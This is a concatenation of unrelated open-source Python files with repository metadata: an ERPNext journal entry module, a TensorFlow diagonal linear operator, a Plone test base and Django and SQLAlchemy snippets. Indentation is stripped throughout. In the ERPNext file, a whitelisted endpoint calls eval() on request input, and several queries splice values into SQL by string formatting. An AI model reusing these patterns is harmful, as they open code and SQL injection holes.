"""Validate totals and docstatus for invoices"""
for reference_name, total in self.reference_totals.iteritems():
reference_type = self.reference_types[reference_name]
if reference_type in ("Sales Invoice", "Purchase Invoice"):
invoice = frappe.db.get_value(reference_type, reference_name,
["docstatus", "outstanding_amount"], as_dict=1)
if invoice.docstatus != 1:
frappe.throw(_("{0} {1} is not submitted").format(reference_type, reference_name))
if total and flt(invoice.outstanding_amount) < total:
frappe.throw(_("Payment against {0} {1} cannot be greater than Outstanding Amount {2}")
.format(reference_type, reference_name, invoice.outstanding_amount))
def set_against_account(self):
accounts_debited, accounts_credited = [], []
for d in self.get("accounts"):
if flt(d.debit > 0): accounts_debited.append(d.party or d.account)
if flt(d.credit) > 0: accounts_credited.append(d.party or d.account)
for d in self.get("accounts"):
if flt(d.debit > 0): d.against_account = ", ".join(list(set(accounts_credited)))
if flt(d.credit > 0): d.against_account = ", ".join(list(set(accounts_debited)))
def validate_debit_and_credit(self):
self.total_debit, self.total_credit, self.difference = 0, 0, 0
for d in self.get("accounts"):
if d.debit and d.credit:
frappe.throw(_("You cannot credit and debit same account at the same time"))
self.total_debit = flt(self.total_debit) + flt(d.debit, d.precision("debit"))
self.total_credit = flt(self.total_credit) + flt(d.credit, d.precision("credit"))
self.difference = flt(self.total_debit, self.precision("total_debit")) - \
flt(self.total_credit, self.precision("total_credit"))
if self.difference:
frappe.throw(_("Total Debit must be equal to Total Credit. The difference is {0}")
.format(self.difference))
def validate_multi_currency(self):
alternate_currency = []
for d in self.get("accounts"):
account = frappe.db.get_value("Account", d.account, ["account_currency", "account_type"], as_dict=1)
d.account_currency = account.account_currency or self.company_currency
d.account_type = account.account_type
if d.account_currency!=self.company_currency and d.account_currency not in alternate_currency:
alternate_currency.append(d.account_currency)
if alternate_currency:
if not self.multi_currency:
frappe.throw(_("Please check Multi Currency option to allow accounts with other currency"))
if len(alternate_currency) > 1:
frappe.throw(_("Only one alternate currency can be used in a single Journal Entry"))
self.set_exchange_rate()
for d in self.get("accounts"):
d.debit = flt(flt(d.debit_in_account_currency)*flt(d.exchange_rate), d.precision("debit"))
d.credit = flt(flt(d.credit_in_account_currency)*flt(d.exchange_rate), d.precision("credit"))
def set_exchange_rate(self):
for d in self.get("accounts"):
if d.account_currency == self.company_currency:
d.exchange_rate = 1
elif not d.exchange_rate or d.account_type=="Bank" or \
(d.reference_type in ("Sales Invoice", "Purchase Invoice") and d.reference_name):
d.exchange_rate = get_exchange_rate(d.account, d.account_currency, self.company,
d.reference_type, d.reference_name, d.debit, d.credit, d.exchange_rate)
if not d.exchange_rate:
frappe.throw(_("Row {0}: Exchange Rate is mandatory").format(d.idx))
def create_remarks(self):
r = []
if self.cheque_no:
if self.cheque_date:
r.append(_('Reference #{0} dated {1}').format(self.cheque_no, formatdate(self.cheque_date)))
else:
msgprint(_("Please enter Reference date"), raise_exception=frappe.MandatoryError)
for d in self.get('accounts'):
if d.reference_type=="Sales Invoice" and d.credit:
r.append(_("{0} against Sales Invoice {1}").format(fmt_money(flt(d.credit), currency = self.company_currency), \
d.reference_name))
if d.reference_type=="Sales Order" and d.credit:
r.append(_("{0} against Sales Order {1}").format(fmt_money(flt(d.credit), currency = self.company_currency), \
d.reference_name))
if d.reference_type == "Purchase Invoice" and d.debit:
bill_no = frappe.db.sql("""select bill_no, bill_date
from `tabPurchase Invoice` where name=%s""", d.reference_name)
if bill_no and bill_no[0][0] and bill_no[0][0].lower().strip() \
not in ['na', 'not applicable', 'none']:
r.append(_('{0} against Bill {1} dated {2}').format(fmt_money(flt(d.debit), currency=self.company_currency), bill_no[0][0],
bill_no[0][1] and formatdate(bill_no[0][1].strftime('%Y-%m-%d'))))
if d.reference_type == "Purchase Order" and d.debit:
r.append(_("{0} against Purchase Order {1}").format(fmt_money(flt(d.credit), currency = self.company_currency), \
d.reference_name))
if self.user_remark:
r.append(_("Note: {0}").format(self.user_remark))
if r:
self.remark = ("\n").join(r) #User Remarks is not mandatory
def set_print_format_fields(self):
for d in self.get('accounts'):
if d.party_type and d.party:
if not self.pay_to_recd_from:
self.pay_to_recd_from = frappe.db.get_value(d.party_type, d.party,
"customer_name" if d.party_type=="Customer" else "supplier_name")
self.set_total_amount(d.debit or d.credit)
elif frappe.db.get_value("Account", d.account, "account_type") in ["Bank", "Cash"]:
self.set_total_amount(d.debit or d.credit)
def set_total_amount(self, amt):
self.total_amount = amt
from frappe.utils import money_in_words
self.total_amount_in_words = money_in_words(amt, self.company_currency)
def make_gl_entries(self, cancel=0, adv_adj=0):
from erpnext.accounts.general_ledger import make_gl_entries
gl_map = []
for d in self.get("accounts"):
if d.debit or d.credit:
gl_map.append(
self.get_gl_dict({
"account": d.account,
"party_type": d.party_type,
"party": d.party,
"against": d.against_account,
"debit": flt(d.debit, d.precision("debit")),
"credit": flt(d.credit, d.precision("credit")),
"account_currency": d.account_currency,
"debit_in_account_currency": flt(d.debit_in_account_currency, d.precision("debit_in_account_currency")),
"credit_in_account_currency": flt(d.credit_in_account_currency, d.precision("credit_in_account_currency")),
"against_voucher_type": d.reference_type,
"against_voucher": d.reference_name,
"remarks": self.remark,
"cost_center": d.cost_center
})
)
if gl_map:
make_gl_entries(gl_map, cancel=cancel, adv_adj=adv_adj)
def get_balance(self):
if not self.get('accounts'):
msgprint(_("'Entries' cannot be empty"), raise_exception=True)
else:
flag, self.total_debit, self.total_credit = 0, 0, 0
diff = flt(self.difference, self.precision("difference"))
# If any row without amount, set the diff on that row
if diff:
blank_row = None
for d in self.get('accounts'):
if not d.credit_in_account_currency and not d.debit_in_account_currency and diff != 0:
blank_row = d
if not blank_row:
blank_row = self.append('accounts', {})
blank_row.exchange_rate = 1
if diff>0:
blank_row.credit_in_account_currency = diff
blank_row.credit = diff
elif diff<0:
blank_row.debit_in_account_currency = abs(diff)
blank_row.debit = abs(diff)
self.validate_debit_and_credit()
def get_outstanding_invoices(self):
self.set('accounts', [])
total = 0
for d in self.get_values():
total += flt(d.outstanding_amount, self.precision("credit", "accounts"))
jd1 = self.append('accounts', {})
jd1.account = d.account
jd1.party = d.party
if self.write_off_based_on == 'Accounts Receivable':
jd1.party_type = "Customer"
jd1.credit = flt(d.outstanding_amount, self.precision("credit", "accounts"))
jd1.reference_type = "Sales Invoice"
jd1.reference_name = cstr(d.name)
elif self.write_off_based_on == 'Accounts Payable':
jd1.party_type = "Supplier"
jd1.debit = flt(d.outstanding_amount, self.precision("debit", "accounts"))
jd1.reference_type = "Purchase Invoice"
jd1.reference_name = cstr(d.name)
jd2 = self.append('accounts', {})
if self.write_off_based_on == 'Accounts Receivable':
jd2.debit = total
elif self.write_off_based_on == 'Accounts Payable':
jd2.credit = total
self.validate_debit_and_credit()
def get_values(self):
cond = " and outstanding_amount <= {0}".format(self.write_off_amount) \
if flt(self.write_off_amount) > 0 else ""
if self.write_off_based_on == 'Accounts Receivable':
return frappe.db.sql("""select name, debit_to as account, customer as party, outstanding_amount
from `tabSales Invoice` where docstatus = 1 and company = %s
and outstanding_amount > 0 %s""" % ('%s', cond), self.company, as_dict=True)
elif self.write_off_based_on == 'Accounts Payable':
return frappe.db.sql("""select name, credit_to as account, supplier as party, outstanding_amount
from `tabPurchase Invoice` where docstatus = 1 and company = %s
and outstanding_amount > 0 %s""" % ('%s', cond), self.company, as_dict=True)
def update_expense_claim(self):
for d in self.accounts:
if d.reference_type=="Expense Claim":
amt = frappe.db.sql("""select sum(debit) as amt from `tabJournal Entry Account`
where reference_type = "Expense Claim" and
reference_name = %s and docstatus = 1""", d.reference_name ,as_dict=1)[0].amt
frappe.db.set_value("Expense Claim", d.reference_name , "total_amount_reimbursed", amt)
def validate_expense_claim(self):
for d in self.accounts:
if d.reference_type=="Expense Claim":
sanctioned_amount, reimbursed_amount = frappe.db.get_value("Expense Claim",
d.reference_name, ("total_sanctioned_amount", "total_amount_reimbursed"))
pending_amount = flt(sanctioned_amount) - flt(reimbursed_amount)
if d.debit > pending_amount:
frappe.throw(_("Row No {0}: Amount cannot be greater than Pending Amount against Expense Claim {1}. Pending Amount is {2}".format(d.idx, d.reference_name, pending_amount)))
def validate_credit_debit_note(self):
if self.stock_entry:
if frappe.db.get_value("Stock Entry", self.stock_entry, "docstatus") != 1:
frappe.throw(_("Stock Entry {0} is not submitted").format(self.stock_entry))
if frappe.db.exists({"doctype": "Journal Entry", "stock_entry": self.stock_entry, "docstatus":1}):
frappe.msgprint(_("Warning: Another {0} # {1} exists against stock entry {2}".format(self.voucher_type, self.name, self.stock_entry)))
def validate_empty_accounts_table(self):
if not self.get('accounts'):
frappe.throw("Accounts table cannot be blank.")
def set_account_and_party_balance(self):
account_balance = {}
party_balance = {}
for d in self.get("accounts"):
if d.account not in account_balance:
account_balance[d.account] = get_balance_on(account=d.account, date=self.posting_date)
if (d.party_type, d.party) not in party_balance:
party_balance[(d.party_type, d.party)] = get_balance_on(party_type=d.party_type,
party=d.party, date=self.posting_date)
d.account_balance = account_balance[d.account]
d.party_balance = party_balance[(d.party_type, d.party)]
@frappe.whitelist()
def get_default_bank_cash_account(company, voucher_type, mode_of_payment=None):
from erpnext.accounts.doctype.sales_invoice.sales_invoice import get_bank_cash_account
if mode_of_payment:
account = get_bank_cash_account(mode_of_payment, company)
if account.get("account"):
account.update({"balance": get_balance_on(account.get("account"))})
return account
if voucher_type=="Bank Entry":
account = frappe.db.get_value("Company", company, "default_bank_account")
if not account:
account = frappe.db.get_value("Account", {"company": company, "account_type": "Bank", "is_group": 0})
elif voucher_type=="Cash Entry":
account = frappe.db.get_value("Company", company, "default_cash_account")
if not account:
account = frappe.db.get_value("Account", {"company": company, "account_type": "Cash", "is_group": 0})
if account:
account_details = frappe.db.get_value("Account", account, ["account_currency", "account_type"], as_dict=1)
return {
"account": account,
"balance": get_balance_on(account),
"account_currency": account_details.account_currency,
"account_type": account_details.account_type
}
@frappe.whitelist()
def get_payment_entry_from_sales_invoice(sales_invoice):
"""Returns new Journal Entry document as dict for given Sales Invoice"""
from erpnext.accounts.utils import get_balance_on
si = frappe.get_doc("Sales Invoice", sales_invoice)
# exchange rate
exchange_rate = get_exchange_rate(si.debit_to, si.party_account_currency, si.company,
si.doctype, si.name)
jv = get_payment_entry(si)
jv.remark = 'Payment received against Sales Invoice {0}. {1}'.format(si.name, si.remarks)
# credit customer
row1 = jv.get("accounts")[0]
row1.account = si.debit_to
row1.account_currency = si.party_account_currency
row1.party_type = "Customer"
row1.party = si.customer
row1.balance = get_balance_on(si.debit_to)
row1.party_balance = get_balance_on(party=si.customer, party_type="Customer")
row1.credit_in_account_currency = si.outstanding_amount
row1.reference_type = si.doctype
row1.reference_name = si.name
row1.exchange_rate = exchange_rate
row1.account_type = "Receivable" if si.customer else ""
# debit bank
row2 = jv.get("accounts")[1]
if row2.account_currency == si.party_account_currency:
row2.debit_in_account_currency = si.outstanding_amount
else:
row2.debit_in_account_currency = si.outstanding_amount * exchange_rate
# set multi currency check
if row1.account_currency != si.company_currency or row2.account_currency != si.company_currency:
jv.multi_currency = 1
return jv.as_dict()
@frappe.whitelist()
def get_payment_entry_from_purchase_invoice(purchase_invoice):
"""Returns new Journal Entry document as dict for given Purchase Invoice"""
pi = frappe.get_doc("Purchase Invoice", purchase_invoice)
exchange_rate = get_exchange_rate(pi.credit_to, pi.party_account_currency, pi.company,
pi.doctype, pi.name)
jv = get_payment_entry(pi)
jv.remark = 'Payment against Purchase Invoice {0}. {1}'.format(pi.name, pi.remarks)
jv.exchange_rate = exchange_rate
# credit supplier
row1 = jv.get("accounts")[0]
row1.account = pi.credit_to
row1.account_currency = pi.party_account_currency
row1.party_type = "Supplier"
row1.party = pi.supplier
row1.balance = get_balance_on(pi.credit_to)
row1.party_balance = get_balance_on(party=pi.supplier, party_type="Supplier")
row1.debit_in_account_currency = pi.outstanding_amount
row1.reference_type = pi.doctype
row1.reference_name = pi.name
row1.exchange_rate = exchange_rate
row1.account_type = "Payable" if pi.supplier else ""
# credit bank
row2 = jv.get("accounts")[1]
if row2.account_currency == pi.party_account_currency:
row2.credit_in_account_currency = pi.outstanding_amount
else:
row2.credit_in_account_currency = pi.outstanding_amount * exchange_rate
# set multi currency check
if row1.account_currency != pi.company_currency or row2.account_currency != pi.company_currency:
jv.multi_currency = 1
return jv.as_dict()
@frappe.whitelist()
def get_payment_entry_from_sales_order(sales_order):
"""Returns new Journal Entry document as dict for given Sales Order"""
from erpnext.accounts.utils import get_balance_on
from erpnext.accounts.party import get_party_account
so = frappe.get_doc("Sales Order", sales_order)
if flt(so.per_billed, 2) != 0.0:
frappe.throw(_("Can only make payment against unbilled Sales Order"))
jv = get_payment_entry(so)
jv.remark = 'Advance payment received against Sales Order {0}.'.format(so.name)
party_account = get_party_account("Customer", so.customer, so.company)
party_account_currency = get_account_currency(party_account)
exchange_rate = get_exchange_rate(party_account, party_account_currency, so.company)
if party_account_currency == so.company_currency:
amount = flt(so.base_grand_total) - flt(so.advance_paid)
else:
amount = flt(so.grand_total) - flt(so.advance_paid)
# credit customer
row1 = jv.get("accounts")[0]
row1.account = party_account
row1.account_currency = party_account_currency
row1.party_type = "Customer"
row1.party = so.customer
row1.balance = get_balance_on(party_account)
row1.party_balance = get_balance_on(party=so.customer, party_type="Customer")
row1.credit_in_account_currency = amount
row1.reference_type = so.doctype
row1.reference_name = so.name
row1.is_advance = "Yes"
row1.exchange_rate = exchange_rate
row1.account_type = "Receivable"
# debit bank
row2 = jv.get("accounts")[1]
if row2.account_currency == party_account_currency:
row2.debit_in_account_currency = amount
else:
row2.debit_in_account_currency = amount * exchange_rate
# set multi currency check
if row1.account_currency != so.company_currency or row2.account_currency != so.company_currency:
jv.multi_currency = 1
return jv.as_dict()
@frappe.whitelist()
def get_payment_entry_from_purchase_order(purchase_order):
"""Returns new Journal Entry document as dict for given Sales Order"""
from erpnext.accounts.utils import get_balance_on
from erpnext.accounts.party import get_party_account
po = frappe.get_doc("Purchase Order", purchase_order)
if flt(po.per_billed, 2) != 0.0:
frappe.throw(_("Can only make payment against unbilled Sales Order"))
jv = get_payment_entry(po)
jv.remark = 'Advance payment made against Purchase Order {0}.'.format(po.name)
party_account = get_party_account("Supplier", po.supplier, po.company)
party_account_currency = get_account_currency(party_account)
exchange_rate = get_exchange_rate(party_account, party_account_currency, po.company)
if party_account_currency == po.company_currency:
amount = flt(po.base_grand_total) - flt(po.advance_paid)
else:
amount = flt(po.grand_total) - flt(po.advance_paid)
# credit customer
row1 = jv.get("accounts")[0]
row1.account = party_account
row1.party_type = "Supplier"
row1.party = po.supplier
row1.balance = get_balance_on(party_account)
row1.party_balance = get_balance_on(party=po.supplier, party_type="Supplier")
row1.debit_in_account_currency = amount
row1.reference_type = po.doctype
row1.reference_name = po.name
row1.is_advance = "Yes"
row1.exchange_rate = exchange_rate
row1.account_type = "Payable"
# debit bank
row2 = jv.get("accounts")[1]
if row2.account_currency == party_account_currency:
row2.credit_in_account_currency = amount
else:
row2.credit_in_account_currency = amount * exchange_rate
# set multi currency check
if row1.account_currency != po.company_currency or row2.account_currency != po.company_currency:
jv.multi_currency = 1
return jv.as_dict()
def get_payment_entry(doc):
bank_account = get_default_bank_cash_account(doc.company, "Bank Entry")
jv = frappe.new_doc('Journal Entry')
jv.voucher_type = 'Bank Entry'
jv.company = doc.company
jv.fiscal_year = doc.fiscal_year
jv.append("accounts")
d2 = jv.append("accounts")
if bank_account:
d2.account = bank_account["account"]
d2.balance = bank_account["balance"]
d2.account_currency = bank_account["account_currency"]
d2.account_type = bank_account["account_type"]
d2.exchange_rate = get_exchange_rate(bank_account["account"],
bank_account["account_currency"], doc.company)
return jv
@frappe.whitelist()
def get_opening_accounts(company):
"""get all balance sheet accounts for opening entry"""
accounts = frappe.db.sql_list("""select name from tabAccount
where is_group=0 and report_type='Balance Sheet' and company=%s""", company)
return [{"account": a, "balance": get_balance_on(a)} for a in accounts]
def get_against_jv(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select jv.name, jv.posting_date, jv.user_remark
from `tabJournal Entry` jv, `tabJournal Entry Account` jv_detail
where jv_detail.parent = jv.name and jv_detail.account = %s and ifnull(jv_detail.party, '') = %s
and ifnull(jv_detail.reference_type, '') = ''
and jv.docstatus = 1 and jv.{0} like %s order by jv.name desc limit %s, %s""".format(searchfield),
(filters.get("account"), cstr(filters.get("party")), "%{0}%".format(txt), start, page_len))
@frappe.whitelist()
def get_outstanding(args):
if not frappe.has_permission("Account"):
frappe.msgprint(_("No Permission"), raise_exception=1)
args = eval(args)
company_currency = get_company_currency(args.get("company"))
if args.get("doctype") == "Journal Entry":
condition = " and party=%(party)s" if args.get("party") else ""
against_jv_amount = frappe.db.sql("""
select sum(ifnull(debit_in_account_currency, 0)) - sum(ifnull(credit_in_account_currency, 0))
from `tabJournal Entry Account` where parent=%(docname)s and account=%(account)s {0}
and ifnull(reference_type, '')=''""".format(condition), args)
against_jv_amount = flt(against_jv_amount[0][0]) if against_jv_amount else 0
amount_field = "credit_in_account_currency" if against_jv_amount > 0 else "debit_in_account_currency"
return {
amount_field: abs(against_jv_amount)
}
elif args.get("doctype") in ("Sales Invoice", "Purchase Invoice"):
invoice = frappe.db.get_value(args["doctype"], args["docname"],
["outstanding_amount", "conversion_rate"], as_dict=1)
exchange_rate = invoice.conversion_rate if (args.get("account_currency") != company_currency) else 1
if args["doctype"] == "Sales Invoice":
amount_field = "credit_in_account_currency" \
if flt(invoice.outstanding_amount) > 0 else "debit_in_account_currency"
else:
amount_field = "debit_in_account_currency" \
if flt(invoice.outstanding_amount) > 0 else "credit_in_account_currency"
return {
amount_field: abs(flt(invoice.outstanding_amount)),
"exchange_rate": exchange_rate
}
@frappe.whitelist()
def get_party_account_and_balance(company, party_type, party):
if not frappe.has_permission("Account"):
frappe.msgprint(_("No Permission"), raise_exception=1)
from erpnext.accounts.party import get_party_account
account = get_party_account(party_type, party, company)
account_balance = get_balance_on(account=account)
party_balance = get_balance_on(party_type=party_type, party=party)
return {
"account": account,
"balance": account_balance,
"party_balance": party_balance
}
@frappe.whitelist()
def get_account_balance_and_party_type(account, date, company, debit=None, credit=None, exchange_rate=None):
"""Returns dict of account balance and party type to be set in Journal Entry on selection of account."""
if not frappe.has_permission("Account"):
frappe.msgprint(_("No Permission"), raise_exception=1)
company_currency = get_company_currency(company)
account_details = frappe.db.get_value("Account", account, ["account_type", "account_currency"], as_dict=1)
if account_details.account_type == "Receivable":
party_type = "Customer"
elif account_details.account_type == "Payable":
party_type = "Supplier"
else:
party_type = ""
grid_values = {
"balance": get_balance_on(account, date),
"party_type": party_type,
"account_type": account_details.account_type,
"account_currency": account_details.account_currency or company_currency,
"exchange_rate": get_exchange_rate(account, account_details.account_currency,
company, debit=debit, credit=credit, exchange_rate=exchange_rate)
}
return grid_values
@frappe.whitelist()
def get_exchange_rate(account, account_currency, company,
reference_type=None, reference_name=None, debit=None, credit=None, exchange_rate=None):
from erpnext.setup.utils import get_exchange_rate
company_currency = get_company_currency(company)
account_details = frappe.db.get_value("Account", account, ["account_type", "root_type"], as_dict=1)
if account_currency != company_currency:
if reference_type in ("Sales Invoice", "Purchase Invoice") and reference_name:
exchange_rate = frappe.db.get_value(reference_type, reference_name, "conversion_rate")
elif account_details and account_details.account_type == "Bank" and \
((account_details.root_type == "Asset" and flt(credit) > 0) or
(account_details.root_type == "Liability" and debit)):
exchange_rate = get_average_exchange_rate(account)
if not exchange_rate and account_currency:
exchange_rate = get_exchange_rate(account_currency, company_currency)
else:
exchange_rate = 1
# don't return None or 0 as it is multipled with a value and that value could be lost
return exchange_rate or 1
def get_average_exchange_rate(account):
exchange_rate = 0
bank_balance_in_account_currency = get_balance_on(account)
if bank_balance_in_account_currency:
bank_balance_in_company_currency = get_balance_on(account, in_account_currency=False)
exchange_rate = bank_balance_in_company_currency / bank_balance_in_account_currency
return exchange_rate
|
mbauskar/alec_frappe5_erpnext
|
erpnext/accounts/doctype/journal_entry/journal_entry.py
|
Python
|
agpl-3.0
| 34,075
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""`LinearOperator` acting like a diagonal matrix."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.linalg import linalg_impl as linalg
from tensorflow.python.ops.linalg import linear_operator
from tensorflow.python.ops.linalg import linear_operator_util
from tensorflow.python.util.tf_export import tf_export
__all__ = ["LinearOperatorDiag",]
@tf_export("linalg.LinearOperatorDiag")
class LinearOperatorDiag(linear_operator.LinearOperator):
"""`LinearOperator` acting like a [batch] square diagonal matrix.
This operator acts like a [batch] diagonal matrix `A` with shape
`[B1,...,Bb, N, N]` for some `b >= 0`. The first `b` indices index a
batch member. For every batch index `(i1,...,ib)`, `A[i1,...,ib, : :]` is
an `N x N` matrix. This matrix `A` is not materialized, but for
purposes of broadcasting this shape will be relevant.
`LinearOperatorDiag` is initialized with a (batch) vector.
```python
# Create a 2 x 2 diagonal linear operator.
diag = [1., -1.]
operator = LinearOperatorDiag(diag)
operator.to_dense()
==> [[1., 0.]
[0., -1.]]
operator.shape
==> [2, 2]
operator.log_abs_determinant()
==> scalar Tensor
x = ... Shape [2, 4] Tensor
operator.matmul(x)
==> Shape [2, 4] Tensor
# Create a [2, 3] batch of 4 x 4 linear operators.
diag = tf.random.normal(shape=[2, 3, 4])
operator = LinearOperatorDiag(diag)
# Create a shape [2, 1, 4, 2] vector. Note that this shape is compatible
# since the batch dimensions, [2, 1], are broadcast to
# operator.batch_shape = [2, 3].
y = tf.random.normal(shape=[2, 1, 4, 2])
x = operator.solve(y)
==> operator.matmul(x) = y
```
#### Shape compatibility
This operator acts on [batch] matrix with compatible shape.
`x` is a batch matrix with compatible shape for `matmul` and `solve` if
```
operator.shape = [B1,...,Bb] + [N, N], with b >= 0
x.shape = [C1,...,Cc] + [N, R],
and [C1,...,Cc] broadcasts with [B1,...,Bb] to [D1,...,Dd]
```
#### Performance
Suppose `operator` is a `LinearOperatorDiag` of shape `[N, N]`,
and `x.shape = [N, R]`. Then
* `operator.matmul(x)` involves `N * R` multiplications.
* `operator.solve(x)` involves `N` divisions and `N * R` multiplications.
* `operator.determinant()` involves a size `N` `reduce_prod`.
If instead `operator` and `x` have shape `[B1,...,Bb, N, N]` and
`[B1,...,Bb, N, R]`, every operation increases in complexity by `B1*...*Bb`.
#### Matrix property hints
This `LinearOperator` is initialized with boolean flags of the form `is_X`,
for `X = non_singular, self_adjoint, positive_definite, square`.
These have the following meaning:
* If `is_X == True`, callers should expect the operator to have the
property `X`. This is a promise that should be fulfilled, but is *not* a
runtime assert. For example, finite floating point precision may result
in these promises being violated.
* If `is_X == False`, callers should expect the operator to not have `X`.
* If `is_X == None` (the default), callers should have no expectation either
way.
"""
def __init__(self,
diag,
is_non_singular=None,
is_self_adjoint=None,
is_positive_definite=None,
is_square=None,
name="LinearOperatorDiag"):
r"""Initialize a `LinearOperatorDiag`.
Args:
diag: Shape `[B1,...,Bb, N]` `Tensor` with `b >= 0` `N >= 0`.
The diagonal of the operator. Allowed dtypes: `float16`, `float32`,
`float64`, `complex64`, `complex128`.
is_non_singular: Expect that this operator is non-singular.
is_self_adjoint: Expect that this operator is equal to its hermitian
transpose. If `diag.dtype` is real, this is auto-set to `True`.
is_positive_definite: Expect that this operator is positive definite,
meaning the quadratic form `x^H A x` has positive real part for all
nonzero `x`. Note that we do not require the operator to be
self-adjoint to be positive-definite. See:
https://en.wikipedia.org/wiki/Positive-definite_matrix#Extension_for_non-symmetric_matrices
is_square: Expect that this operator acts like square [batch] matrices.
name: A name for this `LinearOperator`.
Raises:
TypeError: If `diag.dtype` is not an allowed type.
ValueError: If `diag.dtype` is real, and `is_self_adjoint` is not `True`.
"""
with ops.name_scope(name, values=[diag]):
self._diag = ops.convert_to_tensor(diag, name="diag")
self._check_diag(self._diag)
# Check and auto-set hints.
if not self._diag.dtype.is_complex:
if is_self_adjoint is False:
raise ValueError("A real diagonal operator is always self adjoint.")
else:
is_self_adjoint = True
if is_square is False:
raise ValueError("Only square diagonal operators currently supported.")
is_square = True
super(LinearOperatorDiag, self).__init__(
dtype=self._diag.dtype,
graph_parents=[self._diag],
is_non_singular=is_non_singular,
is_self_adjoint=is_self_adjoint,
is_positive_definite=is_positive_definite,
is_square=is_square,
name=name)
def _check_diag(self, diag):
"""Static check of diag."""
allowed_dtypes = [
dtypes.float16,
dtypes.float32,
dtypes.float64,
dtypes.complex64,
dtypes.complex128,
]
dtype = diag.dtype
if dtype not in allowed_dtypes:
raise TypeError(
"Argument diag must have dtype in %s. Found: %s"
% (allowed_dtypes, dtype))
if diag.get_shape().ndims is not None and diag.get_shape().ndims < 1:
raise ValueError("Argument diag must have at least 1 dimension. "
"Found: %s" % diag)
def _shape(self):
# If d_shape = [5, 3], we return [5, 3, 3].
d_shape = self._diag.get_shape()
return d_shape.concatenate(d_shape[-1:])
def _shape_tensor(self):
d_shape = array_ops.shape(self._diag)
k = d_shape[-1]
return array_ops.concat((d_shape, [k]), 0)
def _assert_non_singular(self):
return linear_operator_util.assert_no_entries_with_modulus_zero(
self._diag,
message="Singular operator: Diagonal contained zero values.")
def _assert_positive_definite(self):
if self.dtype.is_complex:
message = (
"Diagonal operator had diagonal entries with non-positive real part, "
"thus was not positive definite.")
else:
message = (
"Real diagonal operator had non-positive diagonal entries, "
"thus was not positive definite.")
return check_ops.assert_positive(
math_ops.real(self._diag),
message=message)
def _assert_self_adjoint(self):
return linear_operator_util.assert_zero_imag_part(
self._diag,
message=(
"This diagonal operator contained non-zero imaginary values. "
" Thus it was not self-adjoint."))
def _matmul(self, x, adjoint=False, adjoint_arg=False):
diag_term = math_ops.conj(self._diag) if adjoint else self._diag
x = linalg.adjoint(x) if adjoint_arg else x
diag_mat = array_ops.expand_dims(diag_term, -1)
return diag_mat * x
def _matvec(self, x, adjoint=False):
diag_term = math_ops.conj(self._diag) if adjoint else self._diag
return diag_term * x
def _determinant(self):
return math_ops.reduce_prod(self._diag, axis=[-1])
def _log_abs_determinant(self):
log_det = math_ops.reduce_sum(
math_ops.log(math_ops.abs(self._diag)), axis=[-1])
if self.dtype.is_complex:
log_det = math_ops.cast(log_det, dtype=self.dtype)
return log_det
def _solve(self, rhs, adjoint=False, adjoint_arg=False):
diag_term = math_ops.conj(self._diag) if adjoint else self._diag
rhs = linalg.adjoint(rhs) if adjoint_arg else rhs
inv_diag_mat = array_ops.expand_dims(1. / diag_term, -1)
return rhs * inv_diag_mat
def _to_dense(self):
return array_ops.matrix_diag(self._diag)
def _diag_part(self):
return self.diag
def _add_to_tensor(self, x):
x_diag = array_ops.matrix_diag_part(x)
new_diag = self._diag + x_diag
return array_ops.matrix_set_diag(x, new_diag)
@property
def diag(self):
return self._diag
|
ghchinoy/tensorflow
|
tensorflow/python/ops/linalg/linear_operator_diag.py
|
Python
|
apache-2.0
| 9,369
|
import unittest2 as unittest
from Products.CMFCore.utils import getToolByName
from Products.PythonScripts.PythonScript import PythonScript
from collective.portlet.pythonscript.content.interface import IPythonScriptManager
from collective.viewlet.pythonscript.testing import COLLECTIVE_VIEWLET_PYTHONSCRIPT_INTEGRATION
class TestBase(unittest.TestCase):
"""Base test case."""
layer = COLLECTIVE_VIEWLET_PYTHONSCRIPT_INTEGRATION
def setUp(self):
"""Setup fixture."""
self.app = self.layer['app']
self.portal = self.layer['portal']
self.qi_tool = getToolByName(self.portal, 'portal_quickinstaller')
self.ploneSite = self.app.plone
def createPythonScript(self, id_, title, code):
"""Creare new Python Script object."""
ps = PythonScript(id_)
if title:
ps.ZPythonScript_setTitle(title)
ps.write(code)
ps._makeFunction()
return ps
def addPythonScript(self, id_, title, code, container=None):
"""Add new Python Script to Plone Site."""
ps = self.createPythonScript(id_, title, code)
if container is None:
container = self.ploneSite
container[id_] = ps
return ps
def getScriptManager(self):
"""Return script manager for Plone site."""
return IPythonScriptManager(self.ploneSite)
|
radekj/collective.viewlet.pythonscript
|
src/collective/viewlet/pythonscript/tests/base.py
|
Python
|
gpl-2.0
| 1,371
|
from django.conf.urls import include, url
from django.contrib import admin
from products.views import (
ProductCreateView,
ProductUpdateView,
SellerProductListView
)
from .views import (
SellerDashboard,
SellerProductDetailRedirectView,
SellerTransactionListView,
)
urlpatterns = [
url(r'^$', SellerDashboard.as_view(), name='dashboard'),
url(r'^transactions/$', SellerTransactionListView.as_view(), name='transactions'),
url(r'^products/$', SellerProductListView.as_view(), name='product_list'), #sellers:product_list
url(r'^products/(?P<pk>\d+)/$', SellerProductDetailRedirectView.as_view()),
url(r'^products/(?P<pk>\d+)/edit/$', ProductUpdateView.as_view(), name='product_edit'),
url(r'^products/add/$', ProductCreateView.as_view(), name='product_create'),
]
|
codingforentrepreneurs/digital-marketplace
|
src/sellers/urls.py
|
Python
|
mit
| 833
|
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.sql import ClauseElement
DB_URI = 'sqlite:///stuff.db'
db_endine = create_engine(DB_URI)
session = scoped_session(
sessionmaker(
autocommit=False,
autoflush=False,
bind=db_endine
)
)
Model = declarative_base()
def get_or_create(session, model, defaults=None, **kwargs):
instance = session.query(model).filter_by(**kwargs).first()
if instance:
return instance, False
